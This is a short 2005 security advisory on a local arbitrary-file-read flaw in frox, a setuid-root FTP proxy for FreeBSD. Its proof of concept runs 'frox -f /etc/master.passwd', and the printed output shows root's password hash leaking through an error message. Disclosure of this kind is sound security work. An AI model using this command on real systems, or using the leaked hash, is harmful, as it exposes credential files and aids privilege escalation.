=( c1zc0 Security advisory #1 )= =( Frox transparent froxy / cache )= =( found by rotor irc.efnet.org #c1zc0 )= =( http://c1zc0.com - c1zc0 Security 2005 )= Package: frox Frox Author: James Hollingshead Download Site: http://frox.sourceforge.net Vulnrability: File aribitary read access Frox is a transparent proxy/cache system for FreeBSD with the options to be setuid root or be ran as root. Frox has a security risk which allows any user to read protected files on the system. This is because of the way frox handles the loading of configuration files. The problem exists in the -f option ( which specifies the configuration file): POC: q(rotor@xxxxxxxxxxxxxxxxxxxxxx) mq(/usr/local/sbin)-> frox -f /etc/master.passwd Unrecognised option "root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie" at line 3 of /etc/master.passwd Error reading configuration file lq(rotor@xxxxxxxxxxxxxxxxxxxxxx) mq(/usr/local/sbin)-> Vender Has not Been Notified.